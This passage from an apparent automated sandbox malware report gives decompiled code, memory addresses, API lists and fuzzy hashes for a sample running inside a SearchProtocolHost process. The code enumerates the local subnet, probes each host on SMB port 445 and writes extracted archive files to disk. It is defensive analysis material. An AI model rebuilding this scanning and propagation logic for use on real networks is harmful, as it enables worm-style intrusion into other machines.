						asm("xorps xmm0, xmm0");
						_v52 = 0;
						asm("movq [ebp-0x1f], xmm0");
						asm("movups [ebp-0x2f], xmm0");
						_v27 = 0;
						_v23 = 0;
						_v21 = 0;
						E02FA5180( &_v52, 0x20, "%d.%d.%d.*", _t72);
						_t88 = _t87 + 0x18;
						_v312 = 0xf;
						_v316 = 0;
						_v332 = 0;
						if(_v52 != 0) {
							_t56 =  &_v52;
							_t20 = _t56 + 1; // 0x1
							_t78 = _t20;
							do {
								_t73 =  *_t56;
								_t56 = _t56 + 1;
							} while (_t73 != 0);
							_t57 = _t56 - _t78;
							L10:
							_push(_t57);
							_push( &_v52);
							E02FA5A00(_t71,  &_v332, _t82, _t84);
							_v8 = 0;
							_t61 = E02FA7DF0( &_v332,  &_v332);
							_v8 = 0xffffffff;
							 *_t61 = 0;
							_t62 = _v312;
							if(_v312 >= 0x10) {
								E02FA5CF0(_t71, _t78, _t82, _v332, _t62 + 1);
							}
							_v312 = 0xf;
							_v316 = 0;
							_v332 = 0;
							E02FAB4E0(_t71,  *((intOrPtr*)( *(_t84 + 0xc) + _t82)), 1, _t82, 0); // executed
							_t77 =  *(_t84 + 0xc);
							_t87 = _t88 + 4;
							if( *((short*)(_t84 + 0xa)) +  *(_t77 + _t82) >=  *_t84) {
								break;
							} else {
								goto L13;
							}
						}
						_t57 = 0;
						goto L10;
						L13:
						_t67 = _v336 + 1;
						_v336 = _t67;
						_t82 = _t67 * 4;
						_t68 =  *(_t77 + _t82);
						_t72 =  *_t68 & 0x000000ff;
						_t78 = _t68[1] & 0x000000ff;
						_t53 = _t68[2] & 0x000000ff;
					} while (( *_t68 & 0x000000ff) != 0x7f);
					_t81 = Sleep;
					goto L15;
				}
				Sleep(0x2bf20);
				goto L1;
			}




































                                                0x02fa7c23
                                                0x02fa7c25
                                                0x02fa7c30
                                                0x02fa7c31
                                                0x02fa7c37
                                                0x02fa7c3c
                                                0x02fa7c3e
                                                0x02fa7c43
                                                0x02fa7c47
                                                0x02fa7c4d
                                                0x02fa7c53
                                                0x02fa7c53
                                                0x02fa7c61
                                                0x02fa7c66
                                                0x02fa7c75
                                                0x02fa7c7b
                                                0x02fa7c82
                                                0x02fa7c88
                                                0x02fa7c8c
                                                0x00000000
                                                0x00000000
                                                0x02fa7c9a
                                                0x02fa7ca4
                                                0x02fa7ca6
                                                0x02fa7ca9
                                                0x02fa7cad
                                                0x02fa7cb4
                                                0x02fa7ddf
                                                0x02fa7de4
                                                0x00000000
                                                0x02fa7de4
                                                0x02fa7cba
                                                0x02fa7cc0
                                                0x02fa7cc0
                                                0x02fa7cc1
                                                0x02fa7cc8
                                                0x02fa7ccb
                                                0x02fa7cd2
                                                0x02fa7cda
                                                0x02fa7cde
                                                0x02fa7ce5
                                                0x02fa7ceb
                                                0x02fa7cef
                                                0x02fa7cf4
                                                0x02fa7cf7
                                                0x02fa7d05
                                                0x02fa7d0f
                                                0x02fa7d16
                                                0x02fa7d1c
                                                0x02fa7d1f
                                                0x02fa7d1f
                                                0x02fa7d22
                                                0x02fa7d22
                                                0x02fa7d24
                                                0x02fa7d25
                                                0x02fa7d29
                                                0x02fa7d2b
                                                0x02fa7d2b
                                                0x02fa7d2f
                                                0x02fa7d36
                                                0x02fa7d41
                                                0x02fa7d49
                                                0x02fa7d4e
                                                0x02fa7d55
                                                0x02fa7d5b
                                                0x02fa7d64
                                                0x02fa7d6e
                                                0x02fa7d6e
                                                0x02fa7d7a
                                                0x02fa7d84
                                                0x02fa7d91
                                                0x02fa7d98
                                                0x02fa7d9d
                                                0x02fa7da0
                                                0x02fa7dac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa7dac
                                                0x02fa7d18
                                                0x00000000
                                                0x02fa7dae
                                                0x02fa7db4
                                                0x02fa7db5
                                                0x02fa7dbb
                                                0x02fa7dc2
                                                0x02fa7dc5
                                                0x02fa7dc8
                                                0x02fa7dcc
                                                0x02fa7dd0
                                                0x02fa7dd9
                                                0x00000000
                                                0x02fa7dd9
                                                0x02fa7c93
                                                0x00000000

                                                APIs
                                                • gethostname.WS2_32(?,00000100), ref: 02FA7C75
                                                • gethostbyname.WS2_32(?), ref: 02FA7C82
                                                • Sleep.KERNEL32(0002BF20), ref: 02FA7C93
                                                • Sleep.KERNELBASE(000DBBA0), ref: 02FA7DE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Sleep$gethostbynamegethostname
                                                • String ID: %d.%d.%d.*
                                                • API String ID: 3714389383-3742512694
                                                • Opcode ID: a51d16c2b7fca35c0fbbad79958fc56b7baab80f39eadbac01cad751bb500fe9
                                                • Instruction ID: 2dc31193801463bf0305ba6c6d90724fdff8a7ce306e770df13f09a1da8d9689
                                                • Opcode Fuzzy Hash: a51d16c2b7fca35c0fbbad79958fc56b7baab80f39eadbac01cad751bb500fe9
                                                • Instruction Fuzzy Hash: 7051FEB0C002589FDB21DB64CCA4FFEBBB9AF05344F144189E54AAB291DB70AA44CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAB4E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 510 2fab4e0-2fab4f8 511 2fab4fe-2fab501 510->511 512 2fab646-2fab654 call 2fb0a5d 510->512 511->512 514 2fab507-2fab519 EnterCriticalSection 511->514 516 2fab520-2fab524 514->516 517 2fab532-2fab57b call 2fa5180 516->517 518 2fab526-2fab52c 516->518 523 2fab5da-2fab5dc call 2fb0a6e 517->523 524 2fab57d-2fab580 517->524 518->517 519 2fab62c-2fab633 518->519 519->516 522 2fab639-2fab645 LeaveCriticalSection 519->522 522->512 527 2fab5e1-2fab616 call 2fb5c70 call 2fa6f70 523->527 524->519 526 2fab586-2fab5c2 call 2fb0a6e call 2fb5c70 call 2fa6f70 524->526 526->519 539 2fab5c4-2fab5d8 526->539 527->519 538 2fab618-2fab626 527->538 538->519 539->519
                                                C-Code - Quality: 76%
                                                			E02FAB4E0(void* __ebx, signed char* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				short _v11;
				char _v15;
				char _v40;
				char _v41;
				intOrPtr _v48;
				void* __esi;
				signed int _t28;
				intOrPtr _t37;
				intOrPtr _t38;
				signed char* _t51;
				intOrPtr _t61;
				intOrPtr _t63;
				signed int _t64;
				void* _t65;

				_t28 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t28 ^ _t64;
				_t51 = __ecx;
				_v41 = __edx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0x7f) {
					L13:
					return E02FB0A5D(_v8 ^ _t64, _t63);
				} else {
					_push(_t63);
					EnterCriticalSection(0x2fd6a74);
					_t61 = 1;
					do {
						if(_v41 == 0 || _t61 != (_t51[3] & 0x000000ff)) {
							asm("xorps xmm0, xmm0");
							_push(_t61);
							_push(_t51[2] & 0x000000ff);
							_push(_t51[1] & 0x000000ff);
							_v40 = 0;
							asm("movups [ebp-0x23], xmm0");
							_v15 = 0;
							asm("movq [ebp-0x13], xmm0");
							_v11 = 0;
							_v9 = 0;
							E02FA5180( &_v40, 0x20, "%d.%d.%d.%d",  *_t51 & 0x000000ff);
							_t65 = _t65 + 0x1c;
							_t37 = _a4;
							if(_t37 == 0) {
								_t38 = E02FB0A6E(_t63, __eflags, 0x2c); // executed
								_t63 = _t38;
								_v48 = _t63;
								E02FB5C70(_t63, 0x20,  &_v40);
								_t65 = _t65 + 0x10;
								 *((intOrPtr*)(_t63 + 0x20)) = 0;
								 *((intOrPtr*)(_t63 + 0x24)) = 0;
								 *((intOrPtr*)(_t63 + 0x28)) = 0;
								__eflags = E02FA6F70(0x2fd5c48);
								if(__eflags != 0) {
									 *((intOrPtr*)( *0x2fd5c64 +  *0x2fd5c68 * 4)) = _t63;
									 *0x2fd5c68 =  *0x2fd5c68 + 1;
									__eflags =  *0x2fd5c68;
								}
							} else {
								_t71 = _t37 == 1;
								if(_t37 == 1) {
									_t63 = E02FB0A6E(_t63, _t71, 0x2c);
									_v48 = _t63;
									E02FB5C70(_t63, 0x20,  &_v40);
									_t65 = _t65 + 0x10;
									 *((intOrPtr*)(_t63 + 0x20)) = 0;
									 *((intOrPtr*)(_t63 + 0x24)) = 0;
									 *((intOrPtr*)(_t63 + 0x28)) = 1;
									if(E02FA6F70(0x2fd5c20) != 0) {
										 *((intOrPtr*)( *0x2fd5c3c +  *0x2fd5c40 * 4)) = _t63;
										 *0x2fd5c40 =  *0x2fd5c40 + 1;
									}
								}
							}
						}
						_t61 = _t61 + 1;
					} while (_t61 <= 0xff);
					LeaveCriticalSection(0x2fd6a74);
					_pop(_t63);
					goto L13;
				}
			}



















                                                0x02fab4e6
                                                0x02fab4ed
                                                0x02fab4f1
                                                0x02fab4f3
                                                0x02fab4f8
                                                0x02fab646
                                                0x02fab654
                                                0x02fab507
                                                0x02fab507
                                                0x02fab50e
                                                0x02fab514
                                                0x02fab520
                                                0x02fab524
                                                0x02fab536
                                                0x02fab539
                                                0x02fab53a
                                                0x02fab53f
                                                0x02fab54c
                                                0x02fab553
                                                0x02fab557
                                                0x02fab55e
                                                0x02fab563
                                                0x02fab569
                                                0x02fab56d
                                                0x02fab575
                                                0x02fab578
                                                0x02fab57b
                                                0x02fab5dc
                                                0x02fab5e1
                                                0x02fab5ea
                                                0x02fab5ed
                                                0x02fab5f2
                                                0x02fab5f5
                                                0x02fab601
                                                0x02fab608
                                                0x02fab614
                                                0x02fab616
                                                0x02fab623
                                                0x02fab626
                                                0x02fab626
                                                0x02fab626
                                                0x02fab57d
                                                0x02fab57d
                                                0x02fab580
                                                0x02fab58d
                                                0x02fab596
                                                0x02fab599
                                                0x02fab59e
                                                0x02fab5a1
                                                0x02fab5ad
                                                0x02fab5b4
                                                0x02fab5c2
                                                0x02fab5cf
                                                0x02fab5d2
                                                0x02fab5d2
                                                0x02fab5c2
                                                0x02fab580
                                                0x02fab57b
                                                0x02fab62c
                                                0x02fab62d
                                                0x02fab63e
                                                0x02fab645
                                                0x00000000
                                                0x02fab645

                                                APIs
                                                • EnterCriticalSection.KERNEL32(02FD6A74,00000000,00000000,?,?,?,?,?,?,?,02FA7D9D,00000000,00000000,00000000,00000001), ref: 02FAB50E
                                                • new.LIBCMT ref: 02FAB588
                                                • new.LIBCMT ref: 02FAB5DC
                                                • LeaveCriticalSection.KERNEL32(02FD6A74), ref: 02FAB63E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID: %d.%d.%d.%d
                                                • API String ID: 3168844106-3491811756
                                                • Opcode ID: e5c8109fd1d4004a3fe9bbd834e1cec252cbc888dcc9d878b792d99bfb8de3ed
                                                • Instruction ID: 32245deab9ec0188fbd314a25d7c8a9c0b56737c20cb6e44e82def4771829a75
                                                • Opcode Fuzzy Hash: e5c8109fd1d4004a3fe9bbd834e1cec252cbc888dcc9d878b792d99bfb8de3ed
                                                • Instruction Fuzzy Hash: 8F413AB0D403049BE721DF78D854BBEBBF6EF1A384F440599EA45AB281DB755500CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA7140 Relevance: 7.6, APIs: 5, Instructions: 58fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 80%
                                                			E02FA7140(void* __eflags, CHAR* _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t12;
				void* _t13;
				int _t16;
				void* _t21;
				void* _t22;
				long _t24;
				void* _t26;
				void* _t29;

				_v12 = 0;
				_v8 = 0;
				_t12 = E02FA4AC0(_t21, _t22,  &_v12,  &_v8); // executed
				if(_t12 != 0) {
					_t24 = _v8;
					_v16 = 0;
					_t13 = CreateFileA(_a4, 0x40000000, 2, 0, 2, 0x80, 0); // executed
					_t29 = _t13;
					if(_t29 == 0) {
						L5:
						return 0; // executed
					} else {
						_t26 = _v12;
						_t16 = WriteFile(_t29, _t26, _t24,  &_v16, 0); // executed
						_push(_t29);
						if(_t16 != 0) {
							FindCloseChangeNotification(); // executed
							LocalFree(_t26); // executed
							return 1;
						} else {
							CloseHandle();
							goto L5;
						}
					}
				} else {
					return _t12;
				}
			}














                                                0x02fa7149
                                                0x02fa7154
                                                0x02fa715c
                                                0x02fa7166
                                                0x02fa716e
                                                0x02fa7186
                                                0x02fa718d
                                                0x02fa7193
                                                0x02fa7197
                                                0x02fa71b6
                                                0x02fa71bd
                                                0x02fa7199
                                                0x02fa71a0
                                                0x02fa71a5
                                                0x02fa71ab
                                                0x02fa71ae
                                                0x02fa71be
                                                0x02fa71c5
                                                0x02fa71d2
                                                0x02fa71b0
                                                0x02fa71b0
                                                0x00000000
                                                0x02fa71b0
                                                0x02fa71ae
                                                0x02fa716b
                                                0x02fa716b
                                                0x02fa716b

                                                APIs
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 02FA718D
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 02FA71A5
                                                • CloseHandle.KERNEL32(00000000,?,?), ref: 02FA71B0
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID:
                                                • API String ID: 1065093856-0
                                                • Opcode ID: 697f123df4cf43fe86cec64ef7c1f3f449e6175a46e44642eff807a875fe0c8b
                                                • Instruction ID: 932b181584a1a14977d2d4ee757bd958eebb9e7ef9ef177bbea9317a261abde4
                                                • Opcode Fuzzy Hash: 697f123df4cf43fe86cec64ef7c1f3f449e6175a46e44642eff807a875fe0c8b
                                                • Instruction Fuzzy Hash: A5018472D4020CB7EB209E95AD0AFDEFBBC9B45755F504185FD04B7240D7B065158AE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAB3C0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E02FAB3C0(void* __ebx, void* __esi, intOrPtr _a4) {
				void* __edi;
				void* _t9;
				void* _t11;
				intOrPtr _t19;
				intOrPtr _t24;
				void* _t28;

				_t24 = _a4;
				if(_t24 != 0) {
					InterlockedIncrement(0x2fd6a48);
					_t11 = E02FAB320(__ebx, _t24, _t24); // executed
					_t31 = _t11;
					if(_t11 != 0) {
						_push(__ebx);
						_push(__esi);
						_t19 = E02FB0A6E(__esi, _t31, 0x2c);
						_a4 = _t19;
						E02FB5C70(_t19, 0x20, _t24);
						_t28 = _t28 + 0x10;
						 *((intOrPtr*)(_t19 + 0x20)) = 0;
						 *((intOrPtr*)(_t19 + 0x24)) = 0;
						 *((intOrPtr*)(_t19 + 0x28)) =  *((intOrPtr*)(_t24 + 0x28));
						EnterCriticalSection(0x2fd6a5c);
						if(E02FA6F70(0x2fd5b80) != 0) {
							 *((intOrPtr*)( *0x2fd5b9c +  *0x2fd5ba0 * 4)) = _t19;
							 *0x2fd5ba0 =  *0x2fd5ba0 + 1;
						}
						LeaveCriticalSection(0x2fd6a5c);
					}
					_push(0x2c);
					E02FB0AA1(_t24);
					return InterlockedDecrement(0x2fd6a48);
				}
				return _t9;
			}









                                                0x02fab3c4
                                                0x02fab3c9
                                                0x02fab3d4
                                                0x02fab3dc
                                                0x02fab3e1
                                                0x02fab3e3
                                                0x02fab3e5
                                                0x02fab3e6
                                                0x02fab3f1
                                                0x02fab3f7
                                                0x02fab3fa
                                                0x02fab3ff
                                                0x02fab402
                                                0x02fab409
                                                0x02fab410
                                                0x02fab418
                                                0x02fab42a
                                                0x02fab437
                                                0x02fab43a
                                                0x02fab43a
                                                0x02fab445
                                                0x02fab44c
                                                0x02fab44d
                                                0x02fab450
                                                0x00000000
                                                0x02fab45d
                                                0x02fab465

                                                APIs
                                                • InterlockedIncrement.KERNEL32(02FD6A48), ref: 02FAB3D4
                                                  • Part of subcall function 02FAB320: socket.WS2_32(00000002,00000001,00000006), ref: 02FAB33A
                                                  • Part of subcall function 02FAB320: inet_addr.WS2_32(?), ref: 02FAB351
                                                  • Part of subcall function 02FAB320: htons.WS2_32(000001BD), ref: 02FAB35F
                                                  • Part of subcall function 02FAB320: connect.WS2_32(00000000,?,00000010), ref: 02FAB370
                                                  • Part of subcall function 02FAB320: closesocket.WS2_32(00000000), ref: 02FAB37C
                                                • new.LIBCMT ref: 02FAB3E9
                                                • EnterCriticalSection.KERNEL32(02FD6A5C), ref: 02FAB418
                                                • LeaveCriticalSection.KERNEL32(02FD6A5C), ref: 02FAB445
                                                • InterlockedDecrement.KERNEL32(02FD6A48), ref: 02FAB45D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalInterlockedSection$DecrementEnterIncrementLeaveclosesocketconnecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 2254562651-0
                                                • Opcode ID: b8c6755a931c8b62eca342548641069881b2c25fa19ded5ef6bdb57b6139d37a
                                                • Instruction ID: 03f82594d5c010292b5796632f5edd0e2e9090f5b65a93020413e27ef9762e71
                                                • Opcode Fuzzy Hash: b8c6755a931c8b62eca342548641069881b2c25fa19ded5ef6bdb57b6139d37a
                                                • Instruction Fuzzy Hash: 1901FEF4680308ABE7006F65EC55B6A7B3AFF55BD5F940008FF499B341D77194108B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAFB00 Relevance: 6.1, APIs: 4, Instructions: 129COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E02FAFB00(CHAR* __ecx, void* __edx) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				char _v268;
				char _v271;
				char _v272;
				char _v528;
				char _v532;
				struct _FILETIME _v548;
				struct _FILETIME _v556;
				struct _FILETIME _v564;
				long _v568;
				char _v832;
				char _v833;
				struct _OVERLAPPED* _v840;
				long _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t91;
				void _t93;
				void _t95;
				void _t96;
				char _t103;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed int _t113;
				char _t114;
				void* _t116;
				signed int _t124;
				void* _t130;
				long _t133;
				signed int _t143;
				void* _t144;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				long _t166;
				void* _t169;
				signed int _t171;
				char _t172;
				signed int _t173;
				void* _t175;
				void* _t183;
				signed int _t185;
				void* _t191;
				intOrPtr _t192;
				char _t194;
				signed int* _t195;
				signed int _t198;
				signed int* _t206;
				char _t218;
				void* _t226;
				void* _t228;
				void* _t234;
				signed int* _t235;
				signed int _t236;
				CHAR* _t243;
				void* _t244;
				void* _t245;
				signed int _t247;
				signed int* _t248;
				long _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				signed int _t254;
				signed int _t256;
				signed int _t258;
				signed int _t263;
				signed int _t264;
				void* _t268;
				void* _t270;

				_t217 = __edx;
				_t256 = _t263;
				_t264 = _t263 - 0x20c;
				_t91 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t91 ^ _t256;
				_t243 = __ecx;
				_t169 = __edx;
				if(__ecx != 0) {
					_t166 = GetFileAttributesA(__ecx); // executed
					if(_t166 == 0xffffffff) {
						CreateDirectoryA(_t243, 0);
					}
				}
				_t93 =  *_t169;
				if(_t93 == 0) {
					L21:
					_pop(_t244);
					return E02FB0A5D(_v8 ^ _t256, _t244);
				} else {
					_t226 = _t169;
					_t183 = _t169;
					do {
						if(_t93 == 0x2f || _t93 == 0x5c) {
							_t226 = _t183;
						}
						_t93 =  *(_t183 + 1);
						_t183 = _t183 + 1;
					} while (_t93 != 0);
					if(_t226 == _t169) {
						L12:
						_v268 = 0;
						if(_t243 != 0) {
							_t191 =  &_v268 - _t243;
							do {
								_t103 =  *_t243;
								_t243 =  &(_t243[1]);
								 *((char*)(_t191 + _t243 - 1)) = _t103;
							} while (_t103 != 0);
						}
						_t245 = _t169;
						do {
							_t95 =  *_t169;
							_t169 = _t169 + 1;
						} while (_t95 != 0);
						_t171 = _t169 - _t245;
						_t228 =  &_v268 - 1;
						do {
							_t96 =  *(_t228 + 1);
							_t228 = _t228 + 1;
						} while (_t96 != 0);
						_t185 = _t171 >> 2;
						memcpy(_t228, _t245, _t185 << 2);
						if(GetFileAttributesA(memcpy(_t245 + _t185 + _t185, _t245, _t171 & 0x00000003)) == 0xffffffff) {
							CreateDirectoryA( &_v268, 0);
						}
						goto L21;
					} else {
						_t234 = _t226 - _t169;
						E02FC3DB0( &_v528, _t169, _t234);
						_t264 = _t264 + 0xc;
						if(_t234 >= 0x104) {
							E02FB0E90();
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t256);
							_t258 = _t264;
							_t268 = _t264 - 0x344;
							_t107 =  *0x2fcf008; // 0x93ad1eea
							_v548.dwLowDateTime = _t107 ^ _t258;
							_push(_t169);
							_t172 = _v532;
							_push(_t234);
							_t235 = _t183;
							__eflags = _t235[1] - 0xffffffff;
							if(_t235[1] != 0xffffffff) {
								E02FAF2D0( *_t235, _t217);
							}
							_t109 =  *_t235;
							_t192 = _v0;
							_t235[1] = 0xffffffff;
							__eflags = _t192 -  *((intOrPtr*)(_t109 + 4));
							if(_t192 <  *((intOrPtr*)(_t109 + 4))) {
								__eflags = _t192 -  *((intOrPtr*)(_t109 + 0x10));
								if(_t192 <  *((intOrPtr*)(_t109 + 0x10))) {
									E02FAEC60(_t109);
									_t192 = _v0;
								}
								_t110 =  *_t235;
								_push(_t243);
								__eflags =  *((intOrPtr*)(_t110 + 0x10)) - _t192;
								if( *((intOrPtr*)(_t110 + 0x10)) < _t192) {
									do {
										_t254 =  *_t235;
										__eflags = _t254;
										if(_t254 != 0) {
											__eflags =  *(_t254 + 0x18);
											if( *(_t254 + 0x18) != 0) {
												_t217 =  *((intOrPtr*)(_t254 + 0x10)) + 1;
												__eflags = _t217 -  *((intOrPtr*)(_t254 + 4));
												if(_t217 !=  *((intOrPtr*)(_t254 + 4))) {
													 *((intOrPtr*)(_t254 + 0x10)) = _t217;
													 *((intOrPtr*)(_t254 + 0x14)) =  *((intOrPtr*)(_t254 + 0x14)) +  *((intOrPtr*)(_t254 + 0x48)) + 0x2e +  *((intOrPtr*)(_t254 + 0x50)) +  *((intOrPtr*)(_t254 + 0x4c));
													_t37 = _t254 + 0x28; // 0x28
													_t217 = _t37;
													_t38 = _t254 + 0x78; // 0x78
													_t158 = E02FAE7C0(_t254, _t37, _t38, 0, 0);
													_t192 = _v0;
													_t268 = _t268 - 0x10 + 0x1c;
													asm("sbb eax, eax");
													_t160 =  ~_t158 + 1;
													__eflags = _t160;
													 *(_t254 + 0x18) = _t160;
												}
											}
										}
										_t153 =  *_t235;
										__eflags =  *((intOrPtr*)(_t153 + 0x10)) - _t192;
									} while ( *((intOrPtr*)(_t153 + 0x10)) < _t192);
								}
								E02FAF4E0(_t172, _t235, _t217, _t235, _t192,  &_v832);
								__eflags = _v568 & 0x00000010;
								_t113 =  *_t172;
								if((_v568 & 0x00000010) == 0) {
									_t218 = _t172;
									_t194 = _t172;
									__eflags = _t113;
									while(_t113 != 0) {
										__eflags = _t113 - 0x2f;
										if(_t113 == 0x2f) {
											L46:
											_t49 = _t194 + 1; // 0x2fa5105
											_t218 = _t49;
										} else {
											__eflags = _t113 - 0x5c;
											if(_t113 == 0x5c) {
												goto L46;
											}
										}
										_t50 = _t194 + 1; // 0x2fd6a4c
										_t113 =  *_t50;
										_t194 = _t194 + 1;
										__eflags = _t113;
									}
									_t195 = _t172;
									_t247 =  &_v272 - _t172;
									__eflags = _t247;
									do {
										_t114 =  *_t195;
										_t52 =  &(_t195[0]); // 0x2fd6a4c
										_t195 = _t52;
										 *((char*)(_t247 + _t195 - 1)) = _t114;
										__eflags = _t114;
									} while (_t114 != 0);
									__eflags = _t218 - _t172;
									if(_t218 != _t172) {
										_t116 = _t218 - _t172;
										__eflags = _t116 - 0x104;
										if(_t116 >= 0x104) {
											E02FB0E90();
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t247);
											_t248 = _t195;
											_push(_t235);
											__eflags = _t248[1] - 0xffffffff;
											if(_t248[1] != 0xffffffff) {
												E02FAF2D0( *_t248, _t218);
											}
											_t236 =  *_t248;
											_t248[1] = 0xffffffff;
											__eflags = _t236;
											if(_t236 != 0) {
												__eflags =  *(_t236 + 0x7c);
												if( *(_t236 + 0x7c) != 0) {
													E02FAF2D0(_t236, _t218);
												}
												_push(_t172);
												_t173 =  *_t236;
												__eflags = _t173;
												if(_t173 != 0) {
													__eflags =  *((char*)(_t173 + 0x10));
													if( *((char*)(_t173 + 0x10)) != 0) {
														CloseHandle( *(_t173 + 4));
													}
													_push(0x20);
													E02FB0AA1(_t173);
													_t268 = _t268 + 8;
												}
												L02FB5A36(_t236);
											}
											__eflags = 0;
											 *_t248 = 0;
											return 0;
										} else {
											 *((char*)(_t258 + _t116 - 0x108)) = 0;
											_t124 = _v272;
											__eflags = _t124 - 0x2f;
											if(_t124 == 0x2f) {
												L58:
												wsprintfA( &_v532, "%s%s",  &_v272, _t218);
												_t270 = _t268 + 0x10;
												_t198 = 0;
												__eflags = 0;
											} else {
												__eflags = _t124 - 0x5c;
												if(_t124 == 0x5c) {
													goto L58;
												} else {
													__eflags = _t124;
													if(_t124 == 0) {
														goto L57;
													} else {
														__eflags = _v271 - 0x3a;
														if(_v271 == 0x3a) {
															goto L58;
														} else {
															goto L57;
														}
													}
												}
											}
											goto L59;
										}
									} else {
										_v272 = _t114;
										L57:
										_t247 =  &(_t235[0x50]);
										wsprintfA( &_v532, "%s%s%s", _t247,  &_v272, _t218);
										_t270 = _t268 + 0x14;
										_t198 = _t247;
										L59:
										E02FAFB00(_t198,  &_v272); // executed
										_t130 = CreateFileA( &_v532, 0x40000000, 0, 0, 2, _v568, 0); // executed
										_t175 = _t130;
										__eflags = _t175 - 0xffffffff;
										if(_t175 != 0xffffffff) {
											E02FAEF10( *_t235, _t235[0x4e]); // executed
											__eflags = _t235[0x4f];
											if(__eflags == 0) {
												_push(0x4000); // executed
												_t144 = E02FB0AB4(_t247, __eflags); // executed
												_t270 = _t270 + 4;
												_t235[0x4f] = _t144;
											}
											_v840 = 0;
											while(1) {
												_t221 = _t235[0x4f];
												_t133 = E02FAF090( *_t235, _t235[0x4f], 0x4000,  &_v833); // executed
												_t250 = _t133;
												_t270 = _t270 + 8;
												__eflags = _t250 - 0xffffff96;
												if(_t250 == 0xffffff96) {
													break;
												}
												__eflags = _t250;
												if(__eflags < 0) {
													L70:
													_v840 = 0x5000000;
												} else {
													if(__eflags <= 0) {
														L68:
														__eflags = _v833;
														if(_v833 != 0) {
															SetFileTime(_t175,  &_v556,  &_v564,  &_v548); // executed
														} else {
															__eflags = _t250;
															if(_t250 != 0) {
																continue;
															} else {
																goto L70;
															}
														}
													} else {
														_t143 = WriteFile(_t175, _t235[0x4f], _t250,  &_v844, 0); // executed
														__eflags = _t143;
														if(_t143 == 0) {
															_v840 = 0x400;
														} else {
															goto L68;
														}
													}
												}
												L74:
												FindCloseChangeNotification(_t175); // executed
												E02FAF2D0( *_t235, _t221);
												__eflags = _v12 ^ _t258;
												_pop(_t251);
												return E02FB0A5D(_v12 ^ _t258, _t251);
												goto L87;
											}
											_v840 = 0x1000;
											goto L74;
										} else {
											_pop(_t252);
											__eflags = _v12 ^ _t258;
											return E02FB0A5D(_v12 ^ _t258, _t252);
										}
									}
								} else {
									__eflags = _t113 - 0x2f;
									if(_t113 == 0x2f) {
										L41:
										_t206 = 0;
										__eflags = 0;
									} else {
										__eflags = _t113 - 0x5c;
										if(_t113 == 0x5c) {
											goto L41;
										} else {
											__eflags = _t113;
											if(_t113 == 0) {
												L40:
												_t206 =  &(_t235[0x50]);
											} else {
												__eflags =  *((char*)(_t172 + 1)) - 0x3a;
												if( *((char*)(_t172 + 1)) == 0x3a) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
									E02FAFB00(_t206, _t172);
									_pop(_t253);
									__eflags = _v12 ^ _t258;
									return E02FB0A5D(_v12 ^ _t258, _t253);
								}
							} else {
								__eflags = _v12 ^ _t258;
								return E02FB0A5D(_v12 ^ _t258, _t243);
							}
						} else {
							 *((char*)(_t256 + _t234 - 0x20c)) = 0;
							E02FAFB00(_t243,  &_v528);
							goto L12;
						}
					}
				}
				L87:
			}













































































                                                0x02fafb00
                                                0x02fafb01
                                                0x02fafb03
                                                0x02fafb09
                                                0x02fafb10
                                                0x02fafb15
                                                0x02fafb17
                                                0x02fafb1b
                                                0x02fafb1e
                                                0x02fafb27
                                                0x02fafb2c
                                                0x02fafb2c
                                                0x02fafb27
                                                0x02fafb32
                                                0x02fafb36
                                                0x02fafbf8
                                                0x02fafbfb
                                                0x02fafc07
                                                0x02fafb3c
                                                0x02fafb3d
